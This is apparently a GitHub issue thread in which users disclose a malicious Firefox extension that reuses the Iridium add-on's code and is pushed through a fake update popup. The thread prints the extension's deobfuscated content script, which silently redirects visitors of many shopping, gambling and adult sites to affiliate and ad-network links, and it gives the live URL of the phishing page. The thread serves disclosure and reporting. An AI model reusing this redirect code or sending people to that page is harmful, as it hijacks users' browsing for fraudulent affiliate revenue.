Closed sm-Fifteen closed 5 years ago
sm-Fifteen
commented
5 years ago Just for good measure, here's the malicious website that promps you to install said extension. I wouldn't advise anyone to try and go there (it automatically goes into full-screen mode and checks if it still is to make sure you can't exit), but it might be good to know anyway : https://s3.amazonaws.com/ghred/ca/index.html
I've already filed a phishing report to Mozilla about it.
ParticleCore
commented
5 years ago I appreciate the due diligence you took with this and bringing to my attention as well. Reporting it to Mozilla is the right thing to do since they can blacklist the signature that is associated with that webextension seeing that they now need all to be signed in order to be installed on the users's browser, meaning Mozilla can "kill" it when necessary.
If you can, please link the website as well so that this can gather more awareness for any other users under the same situation unaware of what it might be or what they can do about it.
I have also took the liberty to scan the zip you shared so users interested in inspecting the code you shared are not tricked into a wolf-among sheep kind of situation in case you were trying to pass a virus:
https://www.virustotal.com/#/url/62158cf509f70ee8716036d07d185947721c62e5dbf4589ce49832fbed12916f/
ParticleCore
commented
5 years ago It appears the malicious webextension isn't even signed, fortunately this means vanilla Firefox would not allow the installation.
Out of curiosity and if you are willing to, could you described the actions that took for you to come across this situation?
sm-Fifteen
commented
5 years ago Nothing in particular, it's one of those aggressive pop-ups you sometimes see on websites that are a bit desperate for ad revenue sources (more specifically tubeunblock.me, which I rarely use to get around region-locking on youtube).
Makes me ponder why I ever stopped using NoScript. ;)
ParticleCore
commented
5 years ago A simple inspection @sm-Fifteen took the time to de-obfuscate on the extra file added to the original code reveals that this is possibly a cookie hijacker of sorts, very likely to hijack user sessions via cookies or it might be something related to ad-revenue of sorts, but I am no expert on this matter, so here is the decoded code:
function setCookie(_0x7b5dx3, _0x7b5dx4, _0x7b5dx5) {
var _0x7b5dx6 = new Date();
_0x7b5dx6["setTime"](_0x7b5dx6["getTime"]() + (_0x7b5dx5 * 30 * 30 * 1000));
var _0x7b5dx7 = "expires=" + _0x7b5dx6["toUTCString"]();
document["cookie"] = _0x7b5dx3 + "=" + _0x7b5dx4 + ";" + _0x7b5dx7 + ";path=/"
}
function getCookie(_0x7b5dx3) {
var _0x7b5dx9 = _0x7b5dx3 + "=";
var _0x7b5dxa = document["cookie"]["split"](";");
for (var _0x7b5dxb = 0; _0x7b5dxb < _0x7b5dxa["length"]; _0x7b5dxb++) {
var _0x7b5dxc = _0x7b5dxa[_0x7b5dxb];
while (_0x7b5dxc["charAt"](0) == " ") {
_0x7b5dxc = _0x7b5dxc["substring"](1)
};
if (_0x7b5dxc["indexOf"](_0x7b5dx9) == 0) {
return _0x7b5dxc["substring"](_0x7b5dx9["length"], _0x7b5dxc["length"])
}
};
return false
}
var current_domain = window["location"]["hostname"];
if ((current_domain["match" ](/\./g) || [])["length"] > 1) {
current_domain = current_domain["replace"](/^[^.]+\./g, "")
};
var domains = {
"getnaughty.com": "http://performance.affiliaxe.com/aff_c?offer_id=16233&aff_id=5208",
"wellhello.com": "http://performance.affiliaxe.com/aff_c?offer_id=16183&aff_id=5208",
"raspberryketonesmax.com": "http://performance.affiliaxe.com/aff_c?offer_id=19060&aff_id=5208",
"nastydress.com": "http://performance.affiliaxe.com/aff_c?offer_id=21953&aff_id=5208",
"onenightfriend.com": "http://performance.affiliaxe.com/aff_c?offer_id=21214&aff_id=5208",
"latinomeetup.com": "http://performance.affiliaxe.com/aff_c?offer_id=22749&aff_id=5208",
"be2.com.mx": "http://performance.affiliaxe.com/aff_c?offer_id=21625&aff_id=5208",
"phone.instantcheckmate.com": "http://performance.affiliaxe.com/aff_c?offer_id=21529&aff_id=5208",
"xdates18.com": "http://performance.affiliaxe.com/aff_c?offer_id=16495&aff_id=5208",
"hotels.com": "https://ad.admitad.com/g/q38i4899178357b808e19abd4df56e/",
"qertewrt.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"moviooz.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"honkmedia.net": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"geeker.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"tvtubehd.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"hylaplay.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"adyieldoptimizer.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"bestbooklibrary.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"tzarmedia.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
"bluehost.com": "https://www.bluehost.com/track/llerena40/",
"dreamhost.com": "http://mbsy.co/dreamhost/27813716",
"iqoption.com": "http://affiliate.iqoption.com/redir/?aff=52375&afftrack=SUB_ID",
"etoro.com": "http://llerena40.etoro.cpa.clicksure.com",
"plus500.com": "http://www.plus500.com/Download/MultiPlatformDownload.aspx?id=108694&pl=2",
"24option.com": "http://cldlr.com/?a=38471&c=118795&s1=SUB_ID",
"richcasino.com": "https://www.richcasino.com/?sourceID=20020577",
"bingohall.ag": "https://www.bingohall.ag/adpage?sourceID=133406",
"bingocanada.com": "https://www.bingocanada.com/adpage2.asp?sourceID=133407",
"bingoformoney.ag": "https://www.bingoformoney.ag/adpage2.asp?sourceID=133408",
"internetbingo.com": "https://www.internetbingo.com/adpage2.asp?sourceID=133409",
"vicsbingo.ag": "https://www.vicsbingo.ag/adpage2.asp?sourceID=133410",
"southbeachbingo.ag": "https://www.southbeachbingo.ag/adpage2.asp?sourceID=133411",
"instantbingo.ag": "https://www.instantbingo.ag/adpage2.asp?sourceID=133412",
"winwardcasino.ag": "https://www.winwardcasino.ag/adpage2.asp?sourceID=111449",
"slotsvillage.ag": "https://www.slotsvillage.ag/adpage2.asp?sourceID=106622",
"thebescasino.com": "https://www.thebescasino.com/?sourceID=30012932",
"amazon.com": "https://www.amazon.com/b?_encoding=UTF8&tag=addonsmash-20&linkCode=ur2&linkId=50b42eeef84ba67948669a1700411502&camp=1789&creative=9325&node=172282",
"ebay.com": "https://qxsearch.com/ebay.php",
"ebay.com.au": "https://qxsearch.com/ebay.php",
"ebay.be": "https://qxsearch.com/ebay.php",
"ebay.ca": "https://qxsearch.com/ebay.php",
"ebay.fr": "https://qxsearch.com/ebay.php",
"ebay.de": "https://qxsearch.com/ebay.php",
"ebay.in": "https://qxsearch.com/ebay.php",
"ebay.it": "https://qxsearch.com/ebay.php",
"ebay.es": "https://qxsearch.com/ebay.php",
"ebay.co.uk": "https://qxsearch.com/ebay.php",
"888poker.com": "https://mmwebhandler.aff-online.com/c/39679?sr=1375734",
"888poker.dk": "https://mmwebhandler.aff-online.com/c/36460?sr=1375734",
"888poker.es": "https://mmwebhandler.aff-online.com/c/39569?sr=1375734",
"888sport.it": "https://mmwebhandler.aff-online.com/c/38769?sr=1375734",
"bbqbingo.com": "https://mmwebhandler.aff-online.com/c/35944?sr=1375734",
"reefclubcasino.com": "https://mmwebhandler.aff-online.com/c/34730?sr=1375734",
"cloudbet.com": "https://www.cloudbet.com/en/?af_token=f3f98fe976268100689848f7e4aa14c7&utm_source=google.&utm_medium=direct",
"csgoroll.com": "http://csgoroll.com/promo/76561198030168097",
"binance.com": "https://www.binance.com/?ref=15502839",
"csgolive.com": "https://csgolive.com/ref/addonsmash",
"drakewing.com": "https://www.drakewing.com/promo-code/1021953",
"drakemoon.com": "https://www.drakemoon.com/promo-code/3863453",
"livecasino.williamhill.com": "http://performance.afxplay.com/aff_c?offer_id=24373&aff_id=5208",
"fiverr.com": "http://performance.affiliaxe.com/aff_c?offer_id=24355&aff_id=5208",
"vulkanbet.com": "http://performance.affiliaxe.com/aff_c?offer_id=24049&aff_id=5208",
"dji.com": "http://performance.affiliaxe.com/aff_c?offer_id=23941&aff_id=5208",
"gearbest.com": "http://performance.affiliaxe.com/aff_c?offer_id=23057&aff_id=5208",
"zaful.com": "http://performance.affiliaxe.com/aff_c?offer_id=21975&aff_id=5208",
"twinkledeals.com": "http://performance.affiliaxe.com/aff_c?offer_id=21969&aff_id=5208",
"rosegal.com": "http://performance.affiliaxe.com/aff_c?offer_id=21965&aff_id=5208",
"dresslily.com": "http://performance.affiliaxe.com/aff_c?offer_id=21957&aff_id=5208",
"sammydress.com": "http://performance.affiliaxe.com/aff_c?offer_id=21947&aff_id=5208",
"agoda.com": "http://performance.affiliaxe.com/aff_c?offer_id=14727&aff_id=5208",
"dx.com": "http://performance.affiliaxe.com/aff_c?offer_id=7026&aff_id=5208",
"beautifulhalo.com": "http://performance.affiliaxe.com/aff_c?offer_id=25545&aff_id=5208",
"silveroakcasino.com": "http://www.silveroakcasino.eu/click/1/8810/15991/1",
"planet7casino.com": "http://www.planet7casino.eu/click/2/9071/15991/1",
"royalacecasino.com": "http://www.royalacecasino.eu/click/3/8383/15991/1",
"slotmadness.com": "http://www.slotmadness.eu/click/4/9005/15991/1",
"captainjackcasino.com": "http://www.captainjackcasino.eu/click/5/8883/15991/1",
"booking.com": "http://www.booking.com/index.html?aid=1227503",
"namecheap.com": "https://www.namecheap.com/?aff=109347",
"wix.com": "http://performance.affiliaxe.com/aff_c?offer_id=15591&aff_id=5208&aff_sub=SUB_ID",
"aliexpress.com": "https://alitems.com/g/1e8d1144948357b808e116525dc3e8/",
"norton.com": "http://performance.affiliaxe.com/aff_c?offer_id=21168&aff_id=5208",
"betonline.ag": "http://record.commission.bz/_2ehAQxJHdmDUOsjNOfgKeWNd7ZgqdRLk/1/",
"sportsbetting.ag": "http://record.commission.bz/_2ehAQxJHdmAOMRDMpvVHzmNd7ZgqdRLk/1/",
"reimageplus.com": "http://txs9.fosx.gdn/?v=2AAGF07950",
"mackeeper.com": "https://ad.admitad.com/g/26590ab6838357b808e1090faeb426/",
"reezemac.space": "https://ad.admitad.com/g/26590ab6838357b808e1090faeb426/",
"olymptrade.com": "https://olymptrade.com/l/LPL09-03-01en/affiliate?affiliate_id=236904&subid1=&subid2=",
"mcafee.com": "http://performance.affiliaxe.com/aff_c?offer_id=11710&aff_id=5208",
"lazada.co.th": "http://performance.affiliaxe.com/aff_c?offer_id=15859&aff_id=5208",
"tweakbit.com": "http://performance.affiliaxe.com/aff_c?offer_id=25893&aff_id=5208",
"hsselite.com": "http://performance.affiliaxe.com/aff_c?offer_id=24095&aff_id=5208",
"uniblue.com": "http://performance.affiliaxe.com/aff_c?offer_id=23231&aff_id=5208",
"www.booking.com": "http://www.booking.com/index.html?aid=1227503",
"now-forskolin-extract.com": "http://performance.affiliaxe.com/aff_c?offer_id=21981&aff_id=5208",
"geterectondemand.com": "http://performance.affiliaxe.com/aff_c?offer_id=21751&aff_id=5208",
"alphalevoenergy.com": "http://performance.affiliaxe.com/aff_c?offer_id=21591&aff_id=5208",
"garcinia-vip-life.com": "http://performance.affiliaxe.com/aff_c?offer_id=20320&aff_id=5208",
"idollash.com": "http://performance.affiliaxe.com/aff_c?offer_id=19078&aff_id=5208",
"media-fire.org": "http://performance.affiliaxe.com/aff_c?offer_id=12062&aff_id=5208",
"videostripe.com": "http://performance.affiliaxe.com/aff_c?offer_id=12062&aff_id=5208",
"chaturbate.com": "https://chaturbate.com/in/?track=default&tour=g4pe&campaign=yOy8z",
"flirtfair.dk": "http://performance.affiliaxe.com/aff_c?offer_id=27393&aff_id=5208",
"speedify.com": "http://performance.affiliaxe.com/aff_c?offer_id=26261&aff_id=5208",
"rosewholesale.com": "http://performance.affiliaxe.com/aff_c?offer_id=21961&aff_id=5208"
}
if (typeof domains[current_domain] !== "undefined") {
if (!getCookie(domains[current_domain])) {
setCookie(domains[current_domain], "1", 5);
window["location"] = domains[current_domain];
}
};
var domains_nc = {
"yllix.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"tradeadexchange.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"onclickads.net": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"onclicktop.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"popads.net": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"yieldtraffic.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"traffcashtds.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"buzzadnetwork.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"venturead.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"hilltopads.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"epom.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"clicksgear.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"puserving.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"ad-maven.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"blkget.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"onclkds.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"appscase.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"dumedia.ru": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"nextlnk8.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"turbobit.net": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"wowmovix.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"wowmusix.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"u85foldero.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"youporn.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"redtube.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"chaturbate.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"xhamster.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"pornhub.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"exoclick.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"xnxx.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"adbooth.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"thewhizmarketing.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"blpmovies.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
"xvideos.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}"
};
if (typeof domains_nc[current_domain] !== "undefined") {
window["location"] = domains_nc[current_domain]
}
Yeah, see the js file I'd initially linked, which contains the deobfuscated source for the content script. I didn't check the background script, though, and I suspect it does a lot more interesting stuff because, as far as I know, "tabs","webRequest" and "webRequestBlocking" aren't accessible from content scripts.
ParticleCore
commented
5 years ago Apologies, I have skipped part of your text and did not read the part where you mentioned you had already de-obfuscate it. Will replace it in my previous reply.
ParticleCore
commented
5 years ago The background.js file has been completely modified and appears to be designed to turn the user's computer into a zombie machine, probably to be part of a botnet of sorts.
I don't think there is any danger for any users using vanilla Firefox since it does not allow the installation of extensions that are not signed unless users have turned off that protection on their browser.
Rob--W
commented
5 years ago I'm not an Iridium user either, but I coincidentally came across this page. I don't see any new recent entries at the blocklist (I am expecting an entry for ID "{80869932-37ba-4dd4-8dfe-2ef30a2067cc}" at https://blocked.cdn.mozilla.net/ ). Has your report already been processed?
ParticleCore
commented
5 years ago It couldn't be reported because the provided add-on does not have a guid with it. I will however report that guid as potentially belonging to the add-on exposed in this issue. Thanks.
wagnerand
commented
5 years ago For the record, that file was signed (see the META-INFfolder inside the extension). If you can't figure out the ID, that is no problem, just report it to us and attach the entire file.
Note that a report has already been filed for this add-on at https://bugzil.la/1497161
ParticleCore
commented
5 years ago Thanks for the input, I see it has been dealt with, I'll be closing this issue now.
Hi, I'm not an Iridium user myself, but just thought I should let you know that I've had a fake browser update popup attempting to install a firefox extension on my browser. I've reported the website in question to Mozilla and downloaded the XPI to see what kind of extension this was, and the manifest and iridium.user files linked back here, so it appears parts of it were reused from the code of your extension, but the permissions are off and the code for ij.js and background.js is heavily obfuscated.
I'm not entirely sure if I should link to the malicious website in question, but I can probably at least attach the XPI file in question.
ww.zip
I've taken the time to deobfuscate the content script by hand, and it definitely doesn't seem like the code on your github repository to me.
ij-malicious.js.txt
I don't know if the maintainer(s) of this project can really do anything about this, but I figured they'd want to know about this.